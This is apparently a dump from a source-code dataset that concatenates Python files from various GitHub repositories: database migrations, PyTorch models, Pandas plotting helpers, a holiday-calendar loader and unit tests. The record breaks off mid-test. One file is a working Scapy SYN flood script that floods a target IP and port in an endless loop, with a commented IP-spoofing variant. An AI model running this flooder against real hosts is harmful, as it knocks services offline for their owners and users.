max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
libweasyl/libweasyl/alembic/versions/f9226a83bbb6_remove_dead_ads_table.py
|
akash143143/weasyl
| 111 |
61186
|
"""Remove dead ads table
Revision ID: <KEY>
Revises: 1307b62614a4
Create Date: 2020-02-27 23:14:41.314000
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '1307b62614a4'
from alembic import op # lgtm[py/unused-import]
import sqlalchemy as sa # lgtm[py/unused-import]
from sqlalchemy.dialects import postgresql
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('ind_ads_end', table_name='ads')
op.drop_table('ads')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('ads',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('owner', sa.VARCHAR(length=254), autoincrement=False, nullable=False),
sa.Column('link_target', sa.TEXT(), autoincrement=False, nullable=False),
sa.Column('file', sa.INTEGER(), autoincrement=False, nullable=False),
sa.Column('start', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),
sa.Column('end', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['file'], [u'media.mediaid'], name=u'ads_file_fkey', onupdate=u'CASCADE', ondelete=u'CASCADE'),
sa.PrimaryKeyConstraint('id', name=u'ads_pkey')
)
op.create_index('ind_ads_end', 'ads', ['end'], unique=False)
# ### end Alembic commands ###
|
test/testdata/malformed.py
|
Scartography/mapchete
| 161 |
61209
|
# contains neither Process object nor execute() function
|
report_builder_scheduled/migrations/0002_auto_20180413_0747.py
|
nazmizorlu/django-report-builder
| 560 |
61224
|
# Generated by Django 2.0.4 on 2018-04-13 07:47
from django.conf import settings
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('report_builder_scheduled', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='scheduledreport',
name='last_run_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='scheduledreport',
name='users',
field=models.ManyToManyField(blank=True, help_text='Staff users to notify', limit_choices_to={'is_staff': True}, to=settings.AUTH_USER_MODEL),
),
]
|
lav/models/rgb.py
|
Kin-Zhang/LAV
| 122 |
61247
|
import torch
from torch import nn
from torch.nn import functional as F
from .resnet import resnet18, resnet34
from .segmentation import SegmentationHead
from .attention import Attention
from .erfnet import ERFNet
class Normalize(nn.Module):
""" ImageNet normalization """
def __init__(self, mean, std):
super().__init__()
self.mean = nn.Parameter(torch.tensor(mean), requires_grad=False)
self.std = nn.Parameter(torch.tensor(std), requires_grad=False)
def forward(self, x):
return (x - self.mean[None,:,None,None]) / self.std[None,:,None,None]
class RGBModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.num_channels = len(seg_channels)
self.backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.head = None
def forward(self, rgb):
embd = self.backbone(self.normalize(rgb/255.))
return self.head(embd).squeeze(-1)
class RGBSegmentationModel(nn.Module):
def __init__(self, seg_channels):
super().__init__()
self.erfnet = ERFNet(len(seg_channels)+1)
self.normalize = lambda x: (x/255.-.5)*2
def forward(self, rgb):
return self.erfnet(self.normalize(rgb))
class RGBBrakePredictionModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.conv_backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.seg_head = SegmentationHead(512, len(seg_channels)+1)
self.classifier = nn.Sequential(
nn.Linear(1024,1),
nn.Sigmoid()
)
def forward(self, rgb1, rgb2, mask=False):
x1 = self.conv_backbone(self.normalize(rgb1/255.))
x2 = self.conv_backbone(self.normalize(rgb2/255.))
h1 = x1.mean(dim=[2,3])
h2 = x2.mean(dim=[2,3])
pred_bra = self.classifier(torch.cat([h1,h2], dim=1))
if mask:
pred_sem1 = F.interpolate(self.seg_head(x1), scale_factor=4)
pred_sem2 = F.interpolate(self.seg_head(x2), scale_factor=4)
return pred_bra[:,0], pred_sem1, pred_sem2
else:
return pred_bra[:,0]
|
Validation/RecoB/python/bTagAnalysis_harvesting_cfi.py
|
ckamtsikis/cmssw
| 852 |
61273
|
import FWCore.ParameterSet.Config as cms
# BTagPerformanceAnalyzer configuration
from Validation.RecoB.bTagAnalysis_cfi import *
bTagValidationHarvest = bTagHarvestMC.clone()
from DQMOffline.RecoB.bTagAnalysisData_cfi import *
bTagValidationHarvestData = bTagHarvest.clone()
|
scapy/syn-flood/syn_flood.py
|
caesarcc/python-code-tutorials
| 1,059 |
61294
|
from scapy.all import *
import argparse
parser = argparse.ArgumentParser(description="Simple SYN Flood Script")
parser.add_argument("target_ip", help="Target IP address (e.g router's IP)")
parser.add_argument("-p", "--port", help="Destination port (the port of the target's machine service, \
e.g 80 for HTTP, 22 for SSH and so on).")
# parse arguments from the command line
args = parser.parse_args()
# target IP address (should be a testing router/firewall)
target_ip = args.target_ip
# the target port u want to flood
target_port = args.port
# forge IP packet with target ip as the destination IP address
ip = IP(dst=target_ip)
# or if you want to perform IP Spoofing (will work as well)
# ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip)
# forge a TCP SYN packet with a random source port
# and the target port as the destination port
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
# add some flooding data (1KB in this case, don't increase it too much,
# otherwise, it won't work.)
raw = Raw(b"X"*1024)
# stack up the layers
p = ip / tcp / raw
# send the constructed packet in a loop until CTRL+C is detected
send(p, loop=1, verbose=0)
|
Python/data_exchange.py
|
PushpneetSingh/Hello-world
| 1,428 |
61318
|
<filename>Python/data_exchange.py
a = 1
b = 2
print('a = ' + str(a) + ',' + 'b = ' + str(b))
temp = a
a = b
b = temp
print('a = ' + str(a) + ',' + 'b = ' + str(b))
|
visualize_ML/relation.py
|
weme123/visualize_ML
| 195 |
61349
|
import pandas as pd
import numpy as np
from numpy import corrcoef
import matplotlib.pyplot as plt
from sklearn.feature_selection import chi2
from sklearn.feature_selection import f_classif
from math import *
plt.style.use('ggplot')
fig = plt.figure()
COUNTER = 1
#Return the category dictionary,categorical variables list and continuous list for every column in dataframe.
#The categories are assigned as "target(type)_feature(type)"
def get_category(df,target_name,categorical_name,columns_name):
cat_dict = {}
fin_cat_dict = {}
catg_catg = []
cont_cont = []
catg_cont = []
cont_catg = []
for col in columns_name:
if len(df[col].unique())<=2:
cat_dict[col] = "categorical"
elif col in categorical_name:
cat_dict[col] = "categorical"
else:
cat_dict[col] = "continous"
for col in cat_dict:
if cat_dict[col]=="categorical" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_catg"
catg_catg.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="continous":
fin_cat_dict[col] = "cont_cont"
cont_cont.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_cont"
catg_cont.append(col)
else:
fin_cat_dict[col] = "cont_catg"
cont_catg.append(col)
return fin_cat_dict,catg_catg,cont_cont,catg_cont,cont_catg
#Return True if the categorical_name are present in the orignal dataframe columns.
def is_present(columns_name,categorical_name):
ls = [i for i in categorical_name if i not in columns_name]
if len(ls)==0:
return True
else:
raise ValueError(str(ls)+" is not present as a column in the data,Please check the name")
#Function returns list of columns with non-numeric data.
def clean_str_list(df,lst):
rem=[]
for i in lst:
res = any(isinstance(n,str) for n in df[i])
if res == True:
rem.append(i)
for j in rem:
lst.remove(j)
return lst
#Returns the Pearson Correlation Coefficient for the continous data columns.
def pearson_correlation_cont_cont(x,y):
return corrcoef(x,y)
# This function is for the bivariate analysis between two continous varibale.Plots scatter plots and shows the coeff for the data.
def bivariate_analysis_cont_cont(cont_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_cont_list = clean_str_list(df,cont_cont_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_cont_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_cont_list:
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = clean_df[col]
y = np.float32(clean_df[target_name])
corr = pearson_correlation_cont_cont(x,y)
plt.xlabel(col+"\n count "+str(count)+"\n Corr: "+str(np.float32(corr[0][1])), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.scatter(x,y)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#Chi test is used to see association between catgorical vs categorical variables.
#Lower Pvalue are significant they should be < 0.05
#chi value = X^2 = summation [(observed-expected)^2/expected]
# The distribution of the statistic X2 is chi-square with (r-1)(c-1) degrees of freedom, where r represents the number of rows in the two-way table and c represents the number of columns. The distribution is denoted (df), where df is the number of degrees of freedom.
#pvalue = p(df>=x^2)
def evaluate_chi(x,y):
chi,p_val = chi2(x,y)
return chi,p_val
def bivariate_analysis_catg_catg(catg_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size="auto"):
clean_catg_catg_list = clean_str_list(df,catg_catg_list)
clean_df = df.dropna()
target_classes =df[target_name].unique()
label = [str(i) for i in target_classes]
c = 0
for col in clean_catg_catg_list:
summary = clean_df[col].describe()
binwidth = 0.7
if bin_size == 'auto':
bins_size =np.arange(min(clean_df[col].tolist()), max(clean_df[col].tolist()) + binwidth, binwidth)
else:
bins_size = bin_size
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in target_classes]
y = clean_df[target_name]
chi,p_val = evaluate_chi(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n chi: "+str(np.float32(chi[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel("Frequency", fontsize=10)
plt.hist(x,bins=bins_size,stacked=True,label = label)
plt.legend(prop={'size': 10})
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
c+=1
return plt,COUNTER
# Analysis of variance (ANOVA) is a collection of statistical models used to analyze the differences among group means and their associated procedures (such as "variation" among and between groups)
# In its simplest form, ANOVA provides a statistical test of whether or not the means of several groups are equal, and therefore generalizes the t-test to more than two groups. ANOVAs are useful for comparing (testing) three or more means (groups or variables) for statistical significance.
# A one-way ANOVA is used to compare the means of more than two independent groups. A one-way ANOVA comparing just two groups will give you the same results as the independent t test.
def evaluate_anova(x,y):
F_value,pvalue = f_classif(x,y)
return F_value,pvalue
# In descriptive statistics, a box plot or boxplot is a convenient way of graphically depicting groups of numerical data through their quartiles. Box plots may also have lines extending vertically from the boxes (whiskers) indicating variability outside the upper and lower quartiles, hence the terms box-and-whisker plot and box-and-whisker diagram.
# Quartile: In descriptive statistics, the quartiles of a ranked set of data values are the three points that divide the data set into four equal groups, each group comprising a quarter of the data
def bivariate_analysis_cont_catg(cont_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_catg_list = clean_str_list(df,cont_catg_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_catg_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_catg_list:
col_classes =clean_df[col].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[col]==i][target_name]) for i in col_classes]
y = np.float32(clean_df[target_name])
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
# This function is for the bivariate analysis between categorical vs continuous varibale.Plots box plots.
def bivariate_analysis_catg_cont(catg_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
# No need to remove string varible as they are handled by chi2 function of sklearn.
# clean_catg_cont_list = clean_str_list(df,catg_cont_list)
clean_catg_cont_list = catg_cont_list
clean_df = df.dropna()
for col in clean_catg_cont_list:
col_classes =df[target_name].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in col_classes]
y = clean_df[target_name]
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(target_name+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(col, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#returns the total number of subplots to be made.
def total_subplots(df,lst):
clean_df = df.dropna()
total = [len(clean_str_list(clean_df,i)) for i in lst]
return sum(total)
# This function returns new categotical list after removing drop values if in case they are written in both drop and categorical_name list.
def remove_drop_from_catglist(drop,categorical_name):
for col in drop:
if col in categorical_name:
categorical_name.remove(col)
return categorical_name
def plot(data_input,target_name="",categorical_name=[],drop=[],PLOT_COLUMNS_SIZE = 4,bin_size="auto",wspace=0.5,hspace=0.8):
"""
This is the main function to give Bivariate analysis between the target variable and the input features.
Parameters
-----------
data_input : Dataframe
This is the input Dataframe with all data.
target_name : String
The name of the target column.
categorical_name : list
Names of all categorical variable columns with more than 2 classes, to distinguish with the continuous variables.
drop : list
Names of columns to be dropped.
PLOT_COLUMNS_SIZE : int
Number of plots to display vertically in the display window.The row size is adjusted accordingly.
bin_size : int ;default="auto"
Number of bins for the histogram displayed in the categorical vs categorical category.
wspace : int ;default = 0.5
Horizontal padding between subplot on the display window.
hspace : int ;default = 0.5
Vertical padding between subplot on the display window.
-----------
"""
if type(data_input).__name__ == "DataFrame" :
# Column names
columns_name = data_input.columns.values
#To drop user specified columns.
if is_present(columns_name,drop):
data_input = data_input.drop(drop,axis=1)
columns_name = data_input.columns.values
categorical_name = remove_drop_from_catglist(drop,categorical_name)
else:
raise ValueError("Couldn't find it in the input Dataframe!")
if target_name == "":
raise ValueError("Please mention a target variable")
#Checks if the categorical_name are present in the orignal dataframe columns.
categorical_is_present = is_present(columns_name,categorical_name)
target_is_present = is_present(columns_name,[target_name])
if categorical_is_present:
fin_cat_dict,catg_catg_list,cont_cont_list,catg_cont_list,cont_catg_list = get_category(data_input,target_name,categorical_name,columns_name)
#Subplot(Total number of graphs)
total = total_subplots(data_input,[cont_cont_list,catg_catg_list,catg_cont_list,cont_catg_list])
if total < PLOT_COLUMNS_SIZE:
total = PLOT_COLUMNS_SIZE
PLOT_ROW_SIZE = ceil(float(total)/PLOT_COLUMNS_SIZE)
#Call various functions
plot,count = bivariate_analysis_cont_cont(cont_cont_list,data_input,target_name,total,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_catg(catg_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size=bin_size)
plot,count = bivariate_analysis_cont_catg(cont_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_cont(catg_cont_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
fig.subplots_adjust(bottom=0.08,left = 0.05,right=0.97,top=0.93,wspace = wspace,hspace = hspace)
plot.show()
else:
raise ValueError("Make sure input data is a Dataframe.")
|
engineer/utils/gallery.py
|
lingtengqiu/Open-PIFuhd
| 191 |
61356
|
import os
import numpy as np
def save_samples_truncted_prob(fname, points, prob):
'''
Save the visualization of sampling to a ply file.
Red points represent positive predictions.
Green points represent negative predictions.
Parameters
fname: File name to save
points: [N, 3] array of points
prob: [1, N] array of predictions in the range [0~1]
Return:
None
'''
prob = prob.transpose(0, 1).detach().numpy()
r = (prob > 0.5).reshape([-1, 1]) * 255
g = (prob < 0.5).reshape([-1, 1]) * 255
b = np.zeros(r.shape)
to_save = np.concatenate([points, r, g, b,prob], axis=-1)
return np.savetxt(fname,
to_save,
fmt='%.6f %.6f %.6f %d %d %d %.6f',
comments='',
header=(
'ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header').format(
points.shape[0])
)
def save_gallery(preds,samples,names,gallery_id,epoch):
pred = preds[0].cpu()
sample = samples[0].transpose(0, 1).cpu()
name = names[0]
save_gallery_path = os.path.join(gallery_id,name.split('/')[-2],"epoch_{:03d}".format(epoch))
os.makedirs(save_gallery_path,exist_ok=True)
path = os.path.join(save_gallery_path,'pred.ply')
save_samples_truncted_prob(path,sample,pred)
|
exchange_rates/cbr_ru_parse.py
|
gil9red/SimplePyScripts
| 117 |
61409
|
<reponame>gil9red/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
"""Парсер курса доллара и евро за текущую дату от сайта центробанка России."""
import sys
from datetime import date
# pip install robobrowser
from robobrowser import RoboBrowser
date_req = date.today().strftime('%d.%m.%Y')
url = 'http://www.cbr.ru/scripts/XML_daily.asp?date_req=' + date_req
browser = RoboBrowser(
user_agent='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
parser='html.parser'
)
browser.open(url)
rs = browser.response
if not rs.ok:
print(rs.status_code, rs.reason)
sys.exit()
for valute_el in browser.select('Valute'):
char_code = valute_el.select_one('CharCode').get_text(strip=True)
value = valute_el.select_one('Value').get_text(strip=True)
if char_code in ['USD', 'EUR']:
print(char_code, value)
|
tests/unit/butterfree/extract/pre_processing/test_explode_json_column.py
|
fossabot/butterfree
| 208 |
61464
|
from pyspark.sql.types import (
ArrayType,
IntegerType,
StringType,
StructField,
StructType,
)
from butterfree.extract.pre_processing import explode_json_column
from butterfree.testing.dataframe import (
assert_dataframe_equality,
create_df_from_collection,
)
def test_explode_json_column(spark_context, spark_session):
# arrange
input_data = [{"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'}]
target_data = [
{
"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}',
"a": 123,
"b": "abc",
"c": 123,
"d": [1, 2, 3],
}
]
input_df = create_df_from_collection(input_data, spark_context, spark_session)
target_df = create_df_from_collection(target_data, spark_context, spark_session)
json_column_schema = StructType(
[
StructField("a", IntegerType()),
StructField("b", StringType()),
StructField("c", IntegerType()),
StructField("d", ArrayType(IntegerType())),
]
)
# act
output_df = explode_json_column(input_df, "json_column", json_column_schema)
# arrange
assert_dataframe_equality(target_df, output_df)
|
ui/file_manager/video_player/js/cast/compiled_resources2.gyp
|
google-ar/chromium
| 777 |
61477
|
<filename>ui/file_manager/video_player/js/cast/compiled_resources2.gyp
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
# {
# 'target_name': 'cast_extension_discoverer',
# 'includes': ['../../../compile_js2.gypi'],
# },
# {
# 'target_name': 'cast_video_element',
# 'includes': ['../../../compile_js2.gypi'],
# },
# {
# 'target_name': 'caster',
# 'includes': ['../../../compile_js2.gypi'],
# },
# {
# 'target_name': 'media_manager',
# 'includes': ['../../../compile_js2.gypi'],
# },
],
}
|
backend/resources/calendar.py
|
sleepingAnt/viewfinder
| 645 |
61486
|
<reponame>sleepingAnt/viewfinder
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Calendar datamodel.
Calendars provide color to a chronology such as the Viewfinder search/
browse tool.
Calendars are parsed from the "resources/calendars/" subdirectory on
demand and cached.
TODO(spencer): this is a very rough beginning meant to capture
locale-specific holidays. We use here the holiday calendars provided
by Mozilla. The idea in general is to provide an interface to
arbitrary calendars, such as the wealth of calendars available via
Google's calendar app.
"""
__author__ = '<EMAIL> (<NAME>)'
import datetime
import dateutil
import logging
import os
import time
import vobject
from functools import partial
from viewfinder.backend.base import util
class Calendar(object):
"""Interface to loading ICS iCalendar calendar data."""
_RESOURCES_CALENDARS_FMT = '../../resources/calendars/%s'
_DEFAULT_CALENDAR_ID = 'USHolidays.ics'
"""Mapping from locale to holidays calendar."""
_locale_to_holiday_calendar_map = {
'ar_DZ': 'AlgeriaHolidays.ics',
'es_AR': 'ArgentinaHolidays.ics',
'en_AU': 'AustraliaHolidays.ics',
'de_AT': 'AustrianHolidays.ics',
'eu_ES': 'BasqueHolidays.ics',
'nl_BE': 'BelgianDutchHolidays.ics',
'fr_BE': 'BelgianFrenchHolidays.ics',
'de_BE': 'BelgianHolidays.ics',
'es_BO': 'BoliviaHolidays.ics',
'pt_BR': 'BrazilHolidays.ics',
'bg_BG': 'BulgarianHolidays.ics',
'en_CA': 'CanadaHolidays.ics',
'es_CL': 'ChileHolidays.ics',
'zh_CN': 'ChinaHolidays.ics',
'es_CO': 'ColombianHolidays.ics',
'hr_HR': 'CroatiaHolidays.ics',
'cs_CZ': 'CzechHolidays.ics',
'da_DK': 'DanishHolidays.ics',
'be_NL': 'DutchHolidays.ics',
'nl_NL': 'DutchHolidays.ics',
'en_GB': 'EnglishHolidays.ics',
'et_EE': 'EstoniaHolidays.ics',
'fi_FI': 'FinlandHolidays.ics',
'sv_FI': 'FinlandHolidays.ics',
'fr_FR': 'FrenchHolidays.ics',
'fy_NL': 'FrisianHolidays.ics',
'de_DE': 'GermanHolidays.ics',
'en_HK': 'HongKongHolidays.ics',
'zh_HK': 'HongKongHolidays.ics',
'hu_HU': 'HungarianHolidays.ics',
'is_IS': 'IcelandHolidays.ics',
'id_ID': 'IndonesianHolidays.ics',
'it_IT': 'ItalianHolidays.ics',
'ja_JP': 'JapanHolidays.ics',
'sw_KE': 'KenyaHolidays.ics',
'so_KE': 'KenyaHolidays.ics',
'om_KE': 'KenyaHolidays.ics',
'kam_KE': 'KenyaHolidays.ics',
'lv_LV': 'LatviaHolidays.ics',
'lt_LT': 'LithuanianHolidays.ics',
'de_LU': 'LuxembourgHolidays.ics',
'fr_LU': 'LuxembourgHolidays.ics',
'en_NZ': 'NewZealandHolidays.ics',
'mi_NZ': 'NewZealandHolidays.ics',
'nb_NO': 'NorwegianHolidays.ics',
'en_PK': 'PakistanHolidays.ics',
'pa_Arab_PK': 'PakistanHolidays.ics',
'pa_PK': 'PakistanHolidays.ics',
'ur_PK': 'PakistanHolidays.ics',
'es_PE': 'PeruHolidays.ics',
'pl_PL': 'PolishHolidays.ics',
'pt_PT': 'PortugalHolidays.ics',
'en_QLD': 'QueenslandHolidays.ics',
'en_AU_QLD': 'QueenslandHolidays.ics',
'ro_MD': 'RomaniaHolidays.ics',
'ro_RO': 'RomaniaHolidays.ics',
'ru_RU': 'RussiaHolidays.ics',
'ru_UA': 'RussiaHolidays.ics',
'uk_UA': 'RussiaHolidays.ics',
'en_SG': 'SingaporeHolidays.ics',
'zh_Hans_SG': 'SingaporeHolidays.ics',
'zh_SG': 'SingaporeHolidays.ics',
'sk_SK': 'SlovakHolidays.ics',
'af_ZA': 'SouthAfricaHolidays.ics',
'en_ZA': 'SouthAfricaHolidays.ics',
'nr_ZA': 'SouthAfricaHolidays.ics',
'nso_ZA': 'SouthAfricaHolidays.ics',
'ss_ZA': 'SouthAfricaHolidays.ics',
'st_ZA': 'SouthAfricaHolidays.ics',
'tn_ZA': 'SouthAfricaHolidays.ics',
'ts_ZA': 'SouthAfricaHolidays.ics',
've_ZA': 'SouthAfricaHolidays.ics',
'xh_ZA': 'SouthAfricaHolidays.ics',
'zu_ZA': 'SouthAfricaHolidays.ics',
'ko_KR': 'SouthKoreaHolidays.ics',
'es_ES': 'SpanishHolidays.ics',
'si_LK': 'SriLankaHolidays.ics',
'sv_SE': 'SwedishHolidays.ics',
'de_CH': 'SwissHolidays.ics',
'fr_CH': 'SwissHolidays.ics',
'gsw_CH': 'SwissHolidays.ics',
'it_CH': 'SwissHolidays.ics',
'trv_TW': 'TaiwanHolidays.ics',
'zh_Hant_TW': 'TaiwanHolidays.ics',
'zh_TW': 'TaiwanHolidays.ics',
'th_TH': 'ThaiHolidays.ics',
'ku_Latn_TR': 'TurkeyHolidays.ics',
'ku_TR': 'TurkeyHolidays.ics',
'tr_TR': 'TurkeyHolidays.ics',
'cy_GB': 'UKHolidays.ics',
'en_GB': 'UKHolidays.ics',
'gv_GB': 'UKHolidays.ics',
'kw_GB': 'UKHolidays.ics',
'en': 'USHolidays.ics',
'en_US': 'USHolidays.ics',
'es_US': 'USHolidays.ics',
'haw_US': 'USHolidays.ics',
'es_UY': 'UruguayHolidays.ics',
'vi_VN': 'VietnamHolidays.ics',
}
"""Cache for Calendar objects."""
_cache = dict()
def __init__(self, calendar_id):
"""Prepares a calendar for the specified 'calendar_id'.
"""
self.calendar_id = calendar_id
cal_path = os.path.dirname(__file__)
path = os.path.join(cal_path, Calendar._RESOURCES_CALENDARS_FMT % self.calendar_id)
with open(path, 'rb') as f:
self._cal = vobject.readOne(f)
def GetEvents(self, year):
"""Returns the events from the calendar for the year specified.
In cases where the calendar does not span the requested year,
throws a 'NoCalendarDataError' exception.
"""
events = []
for event in self._cal.components():
if event.name == 'VEVENT':
name = event.summary.value
if event.getrruleset():
rruleset = event.getrruleset()
dates = rruleset.between(datetime.datetime(year - 1, 12, 31),
datetime.datetime(year + 1, 1, 1))
if len(dates) >= 1:
if len(dates) > 1:
logging.warning('holiday %s occurs more than once a year: %r' % (name, dates))
delta = event.dtend.value - event.dtstart.value
dtstart = dates[0]
dtend = dtstart + delta
events.append({'name': name,
'dtstart': time.mktime(dtstart.timetuple()),
'dtend': time.mktime(dtend.timetuple())})
else:
dtstart = event.dtstart.value
dtend = event.dtend.value
if dtstart.year == year:
events.append({'name': name,
'dtstart': time.mktime(dtstart.timetuple()),
'dtend': time.mktime(dtend.timetuple())})
return events
@classmethod
def GetCalendar(cls, calendar_id=None):
"""Attempts to locate a cached version of 'calendar_id'. If none is
found, attempts to load from disk.
"""
calendar_id = calendar_id or Calendar._DEFAULT_CALENDAR_ID
if not Calendar._cache.has_key(calendar_id):
cal = Calendar(calendar_id)
Calendar._cache[calendar_id] = cal
return Calendar._cache[calendar_id]
@classmethod
def GetHolidaysByLocale(cls, locale='en_US'):
"""Attempts to match the specified locale with a holidays
calendar. Normalizes the locale by replacing '-' with '_'.
"""
locale = locale.replace('-', '_')
calendar_id = Calendar._locale_to_holiday_calendar_map.get(locale, None) or \
Calendar._DEFAULT_CALENDAR_ID
return Calendar.GetCalendar(calendar_id)
|
roles/openshift_health_checker/test/aos_version_test.py
|
shgriffi/openshift-ansible
| 164 |
61554
|
import pytest
import aos_version
from collections import namedtuple
Package = namedtuple('Package', ['name', 'version'])
expected_pkgs = {
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
},
}
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
# all found
[Package('spam', '3.2.1'), Package('eggs', '3.2.1')],
expected_pkgs,
),
(
# found with more specific version
[Package('spam', '3.2.1'), Package('eggs', '3.2.1.5')],
expected_pkgs,
),
(
[Package('ovs', '2.6'), Package('ovs', '2.4')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_precise_version_found(pkgs, expected_pkgs_dict):
aos_version._check_precise_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expect_not_found', [
(
[],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # none found
),
(
[Package('spam', '3.2.1')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # completely missing
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # not the right version
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5')],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
}
}, # eggs found with multiple versions
),
])
def test_check_precise_version_found_fail(pkgs, expect_not_found):
with pytest.raises(aos_version.PreciseVersionNotFound) as e:
aos_version._check_precise_version_found(pkgs, expected_pkgs)
assert list(expect_not_found.values()) == e.value.problem_pkgs
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
[],
expected_pkgs,
),
(
# more precise but not strictly higher
[Package('spam', '3.2.1.9')],
expected_pkgs,
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
